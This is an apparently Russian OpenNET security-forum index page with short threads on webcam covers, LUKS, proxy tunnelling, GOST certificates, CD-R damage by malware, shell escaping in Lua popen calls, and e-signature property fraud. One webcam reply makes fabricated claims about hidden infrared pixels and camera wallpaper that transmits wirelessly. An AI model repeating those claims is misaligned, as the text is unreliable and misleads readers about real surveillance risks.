The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Создать новую тему
 - Свернуть нити
Пометить прочитанным
1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | Архив | Избранное | Мое | Новое | | |  
Форум Информационная безопасность
Чем заклеить камеру на Macbook?, !*! Аноним, (Разное / Другая система) 22-Фев-25, 11:30  [ | | | ] [линейный вид] [смотреть все]
Сорь, может не совсем в тему, но чем на современных макбуках можно заклеивать камеру? Нужно что-то очень тонкое, вроде листа бумаги. Нужны какие-то наклейки. Но у всех у них отвратительный клей, который оставляет стремные следы, которые можно оторвать вместе с антибликовым покрытием. Хочу чтобы легко снималось и наклеивалось.

Спасибо!

  • изолента, лучше синяя, для эстетов можно даже хб юзать В принципе можно просто , !*! pavel_simple. (?), 20:40 , 23-Фев-25 (1)
    > Сорь, может не совсем в тему, но чем на современных макбуках можно
    > заклеивать камеру? Нужно что-то очень тонкое, вроде листа бумаги. Нужны какие-то
    > наклейки. Но у всех у них отвратительный клей, который оставляет стремные
    > следы, которые можно оторвать вместе с антибликовым покрытием. Хочу чтобы легко
    > снималось и наклеивалось.
    > Спасибо!

    изолента, лучше синяя, для эстетов можно даже хб юзать. В принципе можно просто жвачку налепить или гвоздиком выковырять

    сообщить модератору +/ответить
  • Просто физически вытащи камеру , !*! Аноним (2), 21:52 , 23-Фев-25 (2)
    > Сорь, может не совсем в тему, но чем на современных макбуках можно
    > заклеивать камеру? Нужно что-то очень тонкое, вроде листа бумаги. Нужны какие-то
    > наклейки. Но у всех у них отвратительный клей, который оставляет стремные
    > следы, которые можно оторвать вместе с антибликовым покрытием. Хочу чтобы легко
    > снималось и наклеивалось.
    > Спасибо!

    Просто физически вытащи камеру

    сообщить модератору +/ответить
  • Всё, что хорошо снимается, будет постоянно отклеиваться и отпадать прямо в тот м, !*! DeerFriend (?), 00:16 , 24-Фев-25 (3)
    > Хочу чтобы легко снималось и наклеивалось.

    Всё, что хорошо снимается, будет постоянно отклеиваться и отпадать прямо в тот момент, когда ты голый, а на тебя весь совет директоров смотрит.

    У леновы года 3 назад появились ноутбуки со встроенной шторкой на видимокамеру. У них антиблик не отвалится. У них даже есть матовые экраны, которым антиблик не нужен.

    сообщить модератору +/ответить
  • Всё плохое, что может случиться, обязательно случится Законы Мерфи никто не отм, !*! Neon (??), 04:59 , 24-Фев-25 (4)
    Всё плохое, что может случиться, обязательно случится. Законы Мерфи никто не отменял.
    Просто не стоит открывать ноут в неподходящем виде.)
    Из всех возможных неприятностей произойдёт именно та, ущерб от которой больше.
    От этого, никакая лепучка не спасет.)

    сообщить модератору +/ответить
  • Всего за 8364 49 99 продам Вам две фирменные наклейки на камеру Пишите в ЛС , !*! AppleSellers (?), 08:35 , 02-Мрт-25 (6)
    Всего за €49.99 продам Вам две фирменные наклейки на камеру. Пишите в ЛС.
    сообщить модератору +/ответить
  • Чем заклеить камеру на Macbook?, !*! IT er1 (?), 02:02 , 08-Мрт-25 (7)
    > Сорь, может не совсем в тему, но чем на современных макбуках можно
    > заклеивать камеру? Нужно что-то очень тонкое, вроде листа бумаги. Нужны какие-то
    > наклейки. Но у всех у них отвратительный клей, который оставляет стремные
    > следы, которые можно оторвать вместе с антибликовым покрытием. Хочу чтобы легко
    > снималось и наклеивалось.
    > Спасибо!
    сообщить модератору +/ответить
  • Вдруг кто не знает - они могут между пикселами вставить инфракрасные пикселы, и , !*! IT er1 (?), 02:05 , 08-Мрт-25 (8)
    > Сорь, может не совсем в тему, но чем на современных макбуках можно
    > заклеивать камеру? Нужно что-то очень тонкое, вроде листа бумаги. Нужны какие-то
    > наклейки. Но у всех у них отвратительный клей, который оставляет стремные
    > следы, которые можно оторвать вместе с антибликовым покрытием. Хочу чтобы легко
    > снималось и наклеивалось.
    > Спасибо!

    Вдруг кто не знает - они могут между пикселами вставить инфракрасные пикселы, и видеть за наклейкой - нужно залеплять фольгой!  а так же по бокам экрана инфракрасные датчики - они внутри системы датчики, а в обход - уже не не датчики, а камеры! их то же надо залеплять. еще есть настенные обои - камеры, клеишь их и они сниамют тебя! это вообще никто не расскажет потому что засекречено! заряжаются дистанционно и передают сигнал через беспроводную связь! их то же надо заклеивать!

    сообщить модератору +/ответить
Шифрование разделов LUKS, !*! sheff.artx, (Шифрование, SSH, SSL) 03-Сен-23, 08:03  [ | | | ] [линейный вид] [смотреть все]
Нужно создать шифрованный диск для бэкапа. (Никто не покушается на данные, но паранойя)) Во всех статьях пишут, что сначала требуется создать раздел, а после зашифровать его. Где-то встречал, что таблица разделов должна быть GPT. Но что мешает зашифровать весь диск сразу, минуя разбивку? Это работает, проверял, но какие подводные? Всем благодарен, с меня, как обычно.


Соединение с сервером сбрасывается (vless и т.д), !*! Jcbim, (Linux iptables, ipchains / Linux) 21-Фев-25, 13:13  [ | | | ] [линейный вид] [смотреть все]
Здравствуйте.
На удаленном VPS (находится в Прибалтике) установлена Ubuntu с сервером xray
На клиенте - домашнем компе Nekobox, ОС Windows.
Ютубь работает нормально, нельзягамы и нельзябуки - тоже.
Но захотелось мне поиграть в World of warcraft  на официальном сервере, он европейский.
Провайдер у меня люто режет все что можно и все что нельзя. Без прокси нельзя даже войти в учетку с клиента игры на компе. (В браузере - можно, сайт игры открывется без впнов).
Когда я через тунель в некобоксе захожу на игровой сервер то меня выкидывает через ≈ 5 мин. И так постоянно. Хотя был 1 день когда все хорошо работало, с небольшими подвисаниями, но с сервера не выкидывало.
Вопрос: кто в этой цепи виноват, что меня выкидывает? Местный провайдер? Неместный ростелеком, к которому подключен мой провайдер? А может айпи с VPS где-то блокируется уже в Европе? Как понять? И что делать.

Понижение привилегий root с помощью file capability (CAP)., !*! Аноним, (Linux привязка / Linux) 23-Мрт-22, 17:55  [ | | | ] [линейный вид] [смотреть все]
Скрипты с:
setpriv ...
capsh ...
...
не предлагать!

Править исходники на C для сброса привилегий - не предлагать.

Сыстемды сервисы с cap - не предлагать.

Патчи Capability-NG от Google заманчивые, это то что в принципе подходит, но не предлагать. ;)

Хочу чисто существующими xattr file capability права на файл установить так, чтобы root его запускал и процесс имел пониженные привилегии.

setcap ...

Просмотреть привилегии можно например в pscap.



замена TeamViewer, !*! mmm, (Разное / Другая система) 06-Май-22, 08:24  [ | | | ] [линейный вид] [смотреть все]
Привет!
Ожидаемая новость, TeamViewer заблокировал бесплатные подключения и т.д. В общем хочу спросить кто чем пользуется вместо него, и я так думаю что искать нужно "маде ин наше", дабы не поднимать похожую тему через некоторое время. Естественно клиент нужен под windows, еще лучше с функцией "только запустить", и т. п. Прошу не разводить флуд по поводу того что "большой брат" следит за нами в этих программах, "windows придумали зеленые человечки что бы поработить наш мозг" и в таком духе.


Сертефикат comodo positive ssl, !*! ЦапЦарапыч, (Шифрование, SSH, SSL) 25-Июл-14, 19:17  [ | | | ] [линейный вид] [смотреть все]
Подскажите где купить недорого comodo positive ssl
Нашлось из путевого только https://rus.gogetssl.com/domain-validation/comodo-positive-ssl/
Есть ли еще варианты, желательно наши продавцы.


Сколько лет интернет провайдеры хранят логи? , !*! Базик, (Разное / Другая система) 06-Апр-23, 18:20  [ | | | ] [линейный вид] [смотреть все]
Доброго дня. Может кто из Вас может знать точно сколько лет крупные интернет провайдеры хранят логи интернет пользователей? Нигде не могу найти однозначно информации, то 3 года пишут, то годами... Интересует именно сухое логирование, не подробные логи, которые по Яровой мес 6 должны храниться
Китай tox.chat  и все все все ....., !*! Аноним, (Firewall и пакетные фильтры) 09-Май-23, 17:50  [ | | | ] [линейный вид] [смотреть все]
Добрый день.

Подскажите. Есть такая задача. Надо организовать обмен сообщениями с человеком который поедет Китай не надолго. То есть по сути нужен whatsapp или telegram. Как я слышал там данные программы не работают.

Но если поискать в интернетах, выясняется что подобного рода ПО много, неужели все их тоже блокируют https://en.wikipedia.org/wiki/Comparison_of_cross-platform_i...

Подскажите  кто знает или у кого есть подобный опыт. Мое ТЗ простое надо что бы работало через wifi (есть в отеле), устанавливалось на andriod. Можно было послать текстовое и графическое сообщении.

ПС. Регистрация в wechat озаботился  но там как все не просто.



Угроза принятия неверных решений от некомпетентного ИИ (AI)., !*! Аноним, (Разное / Другая система) 17-Июн-23, 07:08  [ | | | ] [линейный вид] [смотреть все]
В общем сабж.

Слыхал по новостям, что был спор между мером Москвы и гендиректором Сбера по поводу передачи госуправления в "руки" ИИ. Решил впервые пощупать и протестить "интеллект" этого ИИ. Пятница вечер..., вбил в поисковике "chatgpt online" и пошел тролить ИИ.

Результаты:

Сначала задавал ИИ сложные вопросы по ИТ, на которые существует решение. ИИ не смог найти ни одного ответа, но очень хитро увиливал. В принципе был честен, отвечал: что некомпетентен в данной области, что существуют какие-то внутреннее запреты на ответы по конкретно этой теме, что у него лингвистический ИИ, а не естественный и ему сложно отвечать.

Хорошо лингвист этот ИИ так лингвист. Оставил ИТ и решил протестить способность ИИ глубоко понимать текст. Был честен и попросил разрешения ИИ на проведение его теста в области способности глубокого понимания сложного текста. ИИ согласился. Описал ИИ примерно как работает суждение в мозге человека, какими элементарными критериями могут руководствоваться люди, как создать эти критерии и попросил дать ответы на 3 сложных вопроса основываясь на его внутренней модели и знаниях плюс проанализировав конкретный текст. ИИ на первые два вопроса дал неверный ответ, а на третий вопрос ответа от ИИ не дождался. Лично я смог ответить на данные вопросы в возрасте 14-15 лет.

Не считаю, что ИИ надо запретить. Наоборот его надо развивать! Но до уровня передачи управления ИИ каким-то процессом очень далеко. Как очень продвинутый поисковик и система дающая некие необязательные рекомендации, ИИ сегодня уже пригоден.

  • На первые два вопроса надо было проанализировать только данный лингвистический т, !*! Аноним (1), 08:11 , 17-Июн-23 (1)
    > ... Оставил ИТ и решил протестить способность ИИ глубоко понимать текст. ...

    На первые два вопроса надо было проанализировать только данный лингвистический текст, без применения дополнительных знаний и дать ответы "да" или "нет" основываясь только на данном тексте. ИИ неверно истолковал, не понял предложенный ему текст и дал не правильные ответы "да" или "нет"!

    На третий вопрос надо было понять что чисто лингвистического ответа в данном тексте нет. Надо было заметить геометрическую прогрессию и дать ответ основываясь на вводных данных с лингвистического текста и знаниях с алгебры о геометрической прогрессии. ИИ не смог даже понять написанный текст, провести его лингвистический разбор и даже не дошел до того места где следовало применить дополнительные знания о геометрической прогрессии. Задавал наводящие вопросы, тыкал "носом" в конкретные абзацы, ИИ просто не понимал содержание сложного текста. На третий вопрос ответа от ИИ не было и ИИ не признал свою некомпетентность в данной области!

    Может мне поисковик выдал ссылки на тупые ИИ. Может были плохие обучающие модели. Проведите свои тесты ИИ и опишите результаты. Мне ИИ не просто провалил все тесты, а давал ПРИНЦИПИАЛЬНО НЕ ПРАВИЛЬНЫЕ ответы!

    сообщить модератору +/ответить
  • g План эвакуации а-а-аЦелое исследование ни о чём, капитаните, сударь Я с чатжпт, !*! Tron is Whistling (?), 10:05 , 17-Июн-23 (2)
    g План эвакуации а-а-а

    Целое исследование ни о чём, капитаните, сударь.
    Я с чатжпт побаловался единственным вопросом - "где находится [место "на", куда посылают]".
    Оно думало полторы минуты и вывалилось с ошибкой.
    Вот и весь "лингвистический ИИ". Баловство. Даже "не знаю" не выдало.

    сообщить модератору +/ответить
  • Госуправление в плане хозяйственных вещей, типа создания заявок на ремонты дорог, !*! Аноним (3), 13:45 , 17-Июн-23 (3)
    Госуправление в плане хозяйственных вещей, типа создания заявок на ремонты дорог на основе показаний с датчиков (встроенных в эту дорогу) - это уже реализуемая история, ближайшее будущее.
    Принятие политических решений (с помощью) ИИ - совсем другое. В конце концов, ИИ выдаст какую-нибудь странную хрень типа "мыши станьте ежиками", с припиской "я стратег". И наши чиновники возьмутся заставлять народ это дело исполнять, понятное дело. Надо понимать контекст, чтобы комментировать дискуссию.

    Вопрос главный - почему занимались наноболтами в то время, когда на западе создавали сверточные сетки? Причем их создавали в том числе наши выпускники - недостатка в уровне образования не было. Сейчас в последний вагон заскакивать на хайпе не самая выигрышная стратегия.

    Да, пока Греф только планирует заменять своих банкиров на ИИ, государство уже заменило труд целой кучи людей госуслугами. И придумали эту концепцию еще в 90х, Лужков с Примаковым. Это к вопросу о внедрении вещей в госуправлении, сколько десятилетий это занимает в реальности, а не в бреду финансистов. Лет пять поснимают сливки, поколядуют на ИИ-стартапах и перейдут к новой теме.

    сообщить модератору +/ответить
  • Тесты ИИ 2024 https www opennet ru openforum vsluhforumID3 135160 html 47https, !*! Аноним (12), 08:10 , 30-Окт-24 (12)
  • gt оверквотинг удален Необязательные рекомендации вам и бабушки на лавочке у п, !*! Alex5Anc (ok), 07:34 , 01-Дек-24 (19)
    >[оверквотинг удален]
    > согласился. Описал ИИ примерно как работает суждение в мозге человека, какими
    > элементарными критериями могут руководствоваться люди, как создать эти критерии и попросил
    > дать ответы на 3 сложных вопроса основываясь на его внутренней модели
    > и знаниях плюс проанализировав конкретный текст. ИИ на первые два вопроса
    > дал неверный ответ, а на третий вопрос ответа от ИИ не
    > дождался. Лично я смог ответить на данные вопросы в возрасте 14-15
    > лет.
    > Не считаю, что ИИ надо запретить. Наоборот его надо развивать! Но до
    > уровня передачи управления ИИ каким-то процессом очень далеко. Как очень продвинутый
    > поисковик и система дающая некие необязательные рекомендации, ИИ сегодня уже пригоден.

    Необязательные рекомендации вам и бабушки на лавочке у подъезда полную панамку насуют.

    сообщить модератору +/ответить


VLESS через прокси, !*! DanSwano, (VPN, IPSec / Linux) 20-Сен-24, 14:31  [ | | | ] [линейный вид] [смотреть все]
Всем привет.
Есть сервер с поднятым VLESS + nginx на 443 порту, прикидывающийся сайтом. Есть корпоративная сеть с выходом в интернет через прокси с MitM, чтобы пользовать поисковики и некоторые другие сайты, требуется установить самоподписанный корневой сертификат в хранилище. Можно ли через такой прокси подключиться к удаленному серверу по VLESS? Клиент виндовый sing-box-extra: 1.6.4-2 NekoBox: nekoray-3.26-2023-12-09.
может малварь повредить уже записаный write-once лазерный диск?, !*! Юрий, (Разное) 10-Окт-24, 19:53  [ | | | ] [линейный вид] [смотреть все]
Предполагается что привелегий у нее выше крыши.
Насколько понимаю, при записи, например, CD-R, у диска вся поверхность заполнена нулями. Но нолик можно выжечь в единичку лазером. Сменить назад на ноль нельзя, именно поэтому это CD-R, а не CD-RW.

А запись, в норме, заключается в выжигании единичек в нужных местах. Но даже если забить диск под завязку непроженные места останутся, ведь должны же встречаться нули на в файлах и файловой системе. А значит малварь в принцепе способна повредить диск путем прожига оставшихся нулей.

В качестве бонуса для параноиков, можно уничтожить чувствительные данные на CD-R таким же путем.

Я всё правильно понимаю или я где-то ошибаюсь?

  • Похоже можно, хотя и не с каждым приводом - https www 13thmonkey org documenta, !*! ACCA (ok), 00:56 , 11-Окт-24 (1)
    Похоже можно, хотя и не с каждым приводом - https://www.13thmonkey.org/documentation/SCSI/mmc5r04.pdf В общем случае нужно перепрошивать контроллер в приводе.

    А ещё бывают CD-R приводы. Они вообще писать не умеют.

    сообщить модератору +/ответить
  • Хотелось бы понять природу вопроса , !*! Pahanivo пробегал (?), 08:52 , 11-Окт-24 (2) –1
    Хотелось бы понять природу вопроса ....

    сообщить модератору –1 +/ответить
  • Создаю ISO образы и пишу cdrecord на DVD-R ВСЕ стандартное ПО, например cdrecor, !*! Аноним (4), 17:50 , 11-Окт-24 (4)
    Создаю ISO образы и пишу cdrecord на DVD-R. ВСЕ стандартное ПО, например cdrecord откажется писать на записанный диск. Вопрос принят, майлвари можно писать. Но надо менять прошивку диска. Да и CD попавшийся в руки можно испортить проще.
    Перед использованием CD необходимо проверять его подписи и контрольные сумы.
    сообщить модератору +/ответить
  • gt оверквотинг удален при записи на диск используются алгоритмы для контроля и, !*! parad (ok), 23:05 , 11-Окт-24 (5) +1
    >[оверквотинг удален]
    > Насколько понимаю, при записи, например, CD-R, у диска вся поверхность заполнена нулями.
    > Но нолик можно выжечь в единичку лазером. Сменить назад на ноль
    > нельзя, именно поэтому это CD-R, а не CD-RW.
    >  А запись, в норме, заключается в выжигании единичек в нужных местах.
    > Но даже если забить диск под завязку непроженные места останутся, ведь
    > должны же встречаться нули на в файлах и файловой системе. А
    > значит малварь в принцепе способна повредить диск путем прожига оставшихся нулей.
    > В качестве бонуса для параноиков, можно уничтожить чувствительные данные на CD-R таким
    > же путем.
    > Я всё правильно понимаю или я где-то ошибаюсь?

    при записи на диск используются алгоритмы для контроля и восстановления поврежденных данных (саломона-рида, к примеру) и скорее всего блоки защищены/проверяются контрольными суммами. именно благодаря им царапанные диски читаются. сомневаюсь что возможно поверх прожечь диск так (меняя только единицы на нули), чтобы также возможно было подобрать комбинацию для прожига защитных блоков (erasure codes) и контрольных сумм для всего диска или какой-то его значительной части.
    1. это предположение.
    2. это предположение основано на том что считывание осуществляется на нормальном приводе с нормальными драйверами (мез вмешательство в его работу/перепрашивку).
    3. с другой стороны в 90х существовали программы, которые увеличивали ёмкость дискет. скорее всего за счет пространства, занимаемого блоками восстановления (снижая надежность хранения информации). тобиш как минимум прициденнт вмешателства в алгоритмы работы дисководов есть, которые потом проглатывались дисководами без вмешательства. микрософт, к примеру распротранял винду на дискетах ёмкостью 1.7мб, хотя обычная дискета имела объем 1.44мб.
    4. насчет дисков не помню - поищи в интернете, но как мне кажется на митинке продавали диски увеличенной ёмкости, читаемые обычными приводамм (с фильмами и играми). скорее всего там похожий трюк проварачивался. могу ошибаться - давно было. воспаминания туманны, а я стар как вы поняли. )

    резюмируя - если возможно, то сложно...

    сообщить модератору +1 +/ответить
  • На cd диске не хранятся 0 и 1 в том виде как многие думают На самом низком уров, !*! Аноним (6), 11:34 , 13-Окт-24 (6) +2
    На cd диске не хранятся 0 и 1 в том виде как многие думают. На самом низком уровне там EFM кодирование цель которого убрать постоянную составляющую из сигнала и обеспечить восстановление тактового сигнала, чтоб потом уже можно было выделять поток байтов. Поверх которого уже работают алгоритмы выявления и коррекции ошибок более высокого уровня.

    В общем, если модифицировать прошивку, то в теории повредить диск таким образом можно. Записать что то осмысленное нет.

    >[оверквотинг удален]
    > Насколько понимаю, при записи, например, CD-R, у диска вся поверхность заполнена нулями.
    > Но нолик можно выжечь в единичку лазером. Сменить назад на ноль
    > нельзя, именно поэтому это CD-R, а не CD-RW.
    >  А запись, в норме, заключается в выжигании единичек в нужных местах.
    > Но даже если забить диск под завязку непроженные места останутся, ведь
    > должны же встречаться нули на в файлах и файловой системе. А
    > значит малварь в принцепе способна повредить диск путем прожига оставшихся нулей.
    > В качестве бонуса для параноиков, можно уничтожить чувствительные данные на CD-R таким
    > же путем.
    > Я всё правильно понимаю или я где-то ошибаюсь?

    сообщить модератору +2 +/ответить
Криптография X509 GOST: публичные ключи, подписи и шифрование., !*! Аноним, (Шифрование, SSH, SSL) 11-Окт-24, 18:46  [ | | | ] [линейный вид] [смотреть все]
Ванильный gpgsm с ванильными либами libgcrypt и libksba не может импортировать все корневые серты X509 GOST:
  $ gpgsm --import file.cer
И подпись X509 GOST проверить не может:
  $ gpgsm --verify file.p7s file

Как найти и скачать требуемый публичный ключ для проверки GOST подписи и корневой серт удостоверяющего центра для его верификации?

Как узнать у какого УЦ и где искать нужный публичный ключ? Официальный файл экселя мнцифры с перечнем акредитованых УЦ даже не содержит ссылок на их сайты!

Оказалось что многие УЦ публичные ключи раздают только шифруя TLS с помощью GOST. А мой LibreSSL имея какие то хеши GOST не может к этим серверам подключится.

Мне надо патчи для поддержки X509 GOST в:
* gnupg
* libgcrypt
* libksba
* libressl
* gnutls

Может ещё что надо? Прислушаюсь ко всем вашим хорошим советам.

Нашел: https://www.opennet.me/opennews/art.shtml?num=56970 но они используют не найтивные библиотеки, а свои. Желаю пропатчить найтивные либы чтобы можно было хотя бы проверить подпись файла p7s (X509 GOST) и зайти на сайт используя GOST https://...

Зашол к хорошим соседям: https://www.altlinux.org/OSS-GOST-Crypto
Смотрел их гит с патчами GPG: https://www.altlinux.org/GnuPG-GOST сделал diff c ванильными исходниками и поддержки GOST не увидел. В текущих версиях gnupg, libgcrypt, libksba, libressl, gnutls поддержки GOST есть чуть больше. Может обновится до самых новых версий или ещё что надо дома чивать?

Смотрел новый gpg4win с официального сайта, он не может импортировать свежий серт нашего казначейства. Есть его патченные версии, для проверки работоспособности патчей?

Проверять подпись на онлайн сервисах и ходить по https через чужие MitM прокси не советовать!

Bash экранированние, !*! LINUXORGRU, (Безопасное программирование / Linux) 15-Мрт-24, 10:08  [ | | | ] [линейный вид] [смотреть все]
Всем здравствуйте. Хочется критики, суть такая, есть lua (не хихикать) скрипт например который через io.popen() выполняет одни команды читая вывод и опять через io.popen() передаёт этот вывод как ввод другой команде, вроде всё просто.  Но хочется чтобы даже в теории не было так (из за бага/просто кривых рук/положения Венеры в созвездии стрельца) что ввод одной команды попав в popen() как есть не исполнился, чтобы данные были только данными и никак не обрабатывались оболочкой (не исполнялись команды, не обрабатывались спецсимволы оболочки).

Хорошо, тут вот  https://www.opennet.me/docs/RUS/bash_scripting_guide/c1833.h...указано про экранирование в одинарные кавычки с учётом вложенных ежели таковые имеются. Теперь данные это просто данные и не происходит никакой магии, единственное что если эти данные например 'pwd' будут исполнены попав в оболочку, но подумалось что если добавить тупо пробел то что угодно типа 'rm ' уже ну никак не сможет быть исполнено так как оболочка будет искать в PATH как есть вместе с пробелом, но просто с ним ничего там не найдёт, это в теоооории, гарантирует что любая дрянь попавшая в шелл ничего не сделает.

Типа такого


function escape(text)
    return "'" .. text:gsub("'", "'\\''") .. " '" -- пробел в конце дабы сломать поиск в PATH
end

os.execute(escape("тут любая лютая дичь"))


Вопрос, бабабадумс, я дурак и что-то упускаю или всё хорошо?


Размашисто описал, но к примеру я беру через xclip случайные данные которые скопипастил из браузера и передаю их как параметр командной строки другой программе в оболочку предварительно пропустив через escape() что выше описан. И в теории вывод xclip может попасть в оболочку (sh/bash/dash/etc) как есть, но это нужно не допускать даже в теории.


Есть ли подвох?

P.S Да я знаю про пайпы просто шела


app1 | app2

Но, не все программы умеют читать из стандартного ввода, промежуточные данные могут быть как-то в середине модифицированы (для этого lua мне и нужна) вызовы через popen это просто взять данные в одном месте, обработать на lua, передать дальше. И вот про это "передать" я вот балакаю :)

  • gt оверквотинг удален юзай экспорт и энвирон, таблицу эскейпов я тебе не вспом, !*! Аноним (-), 12:14 , 15-Мрт-24 (1)
    >[оверквотинг удален]
    > Есть ли подвох?
    > P.S Да я знаю про пайпы просто шела
    >
     
    > app1 | app2
    >

    > Но, не все программы умеют читать из стандартного ввода, промежуточные данные могут
    > быть как-то в середине модифицированы (для этого lua мне и нужна)
    > вызовы через popen это просто взять данные в одном месте, обработать
    > на lua, передать дальше. И вот про это "передать" я вот
    > балакаю :)

    юзай экспорт и энвирон, таблицу эскейпов я тебе не вспомню, сам хочу запилить экранизатор, в сторону printf %q посмотри еще

    сообщить модератору +/ответить
  • Строки конвертируй в hex , !*! Hello (?), 13:43 , 15-Мрт-24 (3)
    Строки конвертируй в hex.
    сообщить модератору +/ответить
  • man xargsНикогда не надо ничего дергать изнутри программы , !*! Аноним (4), 21:10 , 16-Мрт-24 (4)
    man xargs
    Никогда не надо ничего дергать изнутри программы.
    сообщить модератору +/ответить
  • gt оверквотинг удален если башизмов не боитесь - printf q ЧтоУгодно , !*! мяв (?), 13:33 , 07-Окт-24 (6)
    >[оверквотинг удален]
    > Есть ли подвох?
    > P.S Да я знаю про пайпы просто шела
    >
     
    > app1 | app2
    >

    > Но, не все программы умеют читать из стандартного ввода, промежуточные данные могут
    > быть как-то в середине модифицированы (для этого lua мне и нужна)
    > вызовы через popen это просто взять данные в одном месте, обработать
    > на lua, передать дальше. И вот про это "передать" я вот
    > балакаю :)

    если башизмов не боитесь - printf "%q" 'ЧтоУгодно'

    сообщить модератору +/ответить
  • Хочу похихикать Родина дала им execl - на, пользуйся Не хочу, хочу popen В след, !*! Аноним (7), 14:12 , 07-Окт-24 (7)
    Хочу похихикать.

    >через io.popen()

    Родина дала им execl - на, пользуйся! Не хочу, хочу popen!
    В следующий раз пользуйся тем, у чего есть execl/v()/spawnl/v(). Потому что кто-то (может, даже ты) обязательно не будет экранировать ввод и засунет в popen что не надо.

    >есть ли подвох?
    >text:gsub("'", "'\\''")

    Частично есть. Никогда не обрабатывай на самом деле структурированные (массив, ага) строковые данные с помощью инструментов манипуляции строк. Все эти gsub, split и strip сразу на помойку, если это что-то сложнее базового CSV (и то для CSV в AWK придумали режим). Это что-то типа парсинга HTML регулярками.

    В popen ты должен совать именно сджойненный массив экранированных слов. Экранируешь каждый аргумент, а не всю строку. И вот тогда, когда у тебя внутри escape будет целый аргумент как строка, можешь использовать gsub.

    Короче, сделай себе на popen popenl, который будет принимать МАССИВ и его экранировать по отдельности и будет тебе счастье.

    сообщить модератору +/ответить
  • Тебе не нужен пробел в конце, если ты заэкранировал каждый аргумент и гарантиров, !*! Аноним (7), 14:17 , 07-Окт-24 (8)
    >пробел в конце

    Тебе не нужен пробел в конце, если ты заэкранировал каждый аргумент и гарантированно контролируешь первое слово в команде. Лучше озаботься валидацией вот этого первого слова-команды.

    Если ты вызываешь стандартные утилиты, которые понимают -- как запрет чтения флагов, выставляй -- перед данными.

    сообщить модератору +/ответить
У меня отжали 2 квартиры в Москве с помощью ЭЦП, !*! Nxx, (Авторизация и аутентификация / Другая система) 16-Дек-20, 20:12  [ | | | ] [линейный вид] [смотреть все]
Я нахожусь за границей. В ноябре у меня отжали две квартиры 3к и 2к в Москве с помощью поддельной электронно-цифровой подписи. Кроме того, у меня взломали аккаунт на госуслугах.

У меня никогда не было ЭЦП и я даже не знаю, что это такое. Паспорта со мной, я их не терял.

Адвокаты требуют предоплату 250 тыс+5% от стоимости возвращенного имущества (а это 1 миллион р).
У меня таких денег нет. Плюс, неизвестно, сколько ЭЦП на моё имя мошенники выпустили. Я отменю одну, а может, у них 10.

Что делать?

  • Оставаться за границей, а то ещё и кредит за дядю возвращать придётся , !*! Аноним (1), 20:29 , 16-Дек-20 (1) –1
    > Что делать?

    Оставаться за границей, а то ещё и кредит за дядю возвращать придётся.

    сообщить модератору –1 +/ответить
  • Найти юриста, поднять шум, обратиться в СМИ - МедиаЗона, Znak, Новая Газета, Дож, !*! Фяф (?), 20:45 , 16-Дек-20 (2) +1
    Найти юриста, поднять шум, обратиться в СМИ - МедиаЗона, Znak, Новая Газета, Дождь, медиа-персоны с обширным кругом подписчиков. Этож что же выходит, в это стране уже можно лишиться собственности без ведома и участия?
    сообщить модератору +1 +/ответить
  • Зачем это здесь Где подтверждения с выписками из ЕГРН Подобное мошенничество был, !*! DeerFriend (?), 21:39 , 16-Дек-20 (8) +1
    Зачем это здесь?
    Где подтверждения с выписками из ЕГРН?
    Подобное мошенничество было актуально 2 года назад, сейчас уже нет.
    сообщить модератору +1 +/ответить
  • Идти в полицию и писать заявление Далее искать юриста для написания искового за, !*! Аноним (11), 23:30 , 16-Дек-20 (11) +3
    Идти в полицию и писать заявление.
    Далее искать юриста для написания искового заявления (отмена сделки купли-продажи).

    -----
    Госдума в среду [24 июля 2019 г.] приняла закон о защите граждан от мошеннических действий с их недвижимостью, совершаемых при помощи электронной подписи.

    Согласно документу, передать права на недвижимость физлица на основании заявления, поданного в электронной форме, можно будет, если собственник заранее уведомил об этом Росреестр.

    Регистрирующий орган должен будет проставить специальную отметку в реестре о возможности отчуждения данного объекта на основании электронного заявления с использованием усиленной квалифицированной электронной подписи. Без нее Росреестр не сможет рассматривать документы. Проставить отметку можно будет в Едином государственном реестре недвижимости (ЕГРН) через личное заявление владельца или его законного представителя, а также через почтовое отправление в Росреестр.
    -----

    Скомпрометирован Росреестр?

    В любом случае здесь вам не помогут.

    сообщить модератору +3 +/ответить
  • https www opennet ru openforum vsluhforumID10 5512 htmlЯ не юрист и могу ошиба, !*! Аноним (18), 07:15 , 22-Дек-20 (18) +1
    https://www.opennet.me/openforum/vsluhforumID10/5512.html

    Я не юрист и могу ошибаться.

    У удостоверяющего центра выдавшего заведомо поддельный сертификат есть ответственность:

    1. Криминальная, за соучастие в мошенничестве. Пиши заявление в полицию, СК, Прокуратуру на удостоверяющий центр выдавший потдельный сертификат.

    2. Гражданско правовая за вред твоему имуществу. Пиши исковое заявление в Суд на удостоверяющий центр с требованием выплатить стоимость двух квартир и моральную компенсацию в размере десяти стоимостей двух квартир.

    http://www.consultant.ru/document/cons_doc_LAW_112701/acd401.../

    Статья 13. Удостоверяющий центр
    3) предоставлять безвозмездно любому лицу по его обращению в соответствии с установленным порядком доступа к реестру сертификатов информацию, содержащуюся в реестре сертификатов, в том числе информацию об аннулировании сертификата ключа проверки электронной подписи;

    3. Удостоверяющий центр в соответствии с законодательством Российской Федерации несет ответственность за вред, причиненный третьим лицам в результате:
    1) неисполнения или ненадлежащего исполнения обязательств, вытекающих из договора оказания услуг удостоверяющим центром;
    2) неисполнения или ненадлежащего исполнения обязанностей, предусмотренных настоящим Федеральным законом.

    http://www.consultant.ru/document/cons_doc_LAW_112701/03690e.../
    Статья 15. Аккредитованный удостоверяющий центр
    3. Аккредитованный удостоверяющий центр обязан обеспечить любому лицу безвозмездный доступ с использованием информационно-телекоммуникационных сетей, в том числе сети "Интернет", к реестру квалифицированных сертификатов этого аккредитованного удостоверяющего центра в любое время в течение срока деятельности этого удостоверяющего центра, если иное не установлено федеральными законами или принимаемыми в соответствии с ними нормативными правовыми актами.

    7. Аккредитованный удостоверяющий центр (работник аккредитованного удостоверяющего центра, доверенные лица и их работники) несет гражданско-правовую, административную и (или) уголовную ответственность в соответствии с законодательством Российской Федерации за неисполнение обязанностей, установленных настоящим Федеральным законом и иными принимаемыми в соответствии с ним нормативными правовыми актами, а также порядком реализации функций аккредитованного удостоверяющего центра и исполнения его обязанностей.

    сообщить модератору +1 +/ответить
  • http www consultant ru document cons_doc_LAW_112701 8431d104d9d3f38ead39f587b9, !*! Аноним (21), 14:08 , 22-Дек-20 (21)
